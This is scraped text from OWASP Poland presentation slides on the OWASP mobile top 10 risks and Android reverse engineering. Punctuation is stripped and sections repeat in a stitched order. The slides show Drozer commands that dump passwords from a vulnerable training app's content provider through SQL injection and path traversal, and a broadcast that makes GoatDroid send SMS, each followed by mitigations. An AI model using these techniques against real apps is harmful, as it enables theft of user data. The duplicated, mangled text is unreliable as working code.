public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
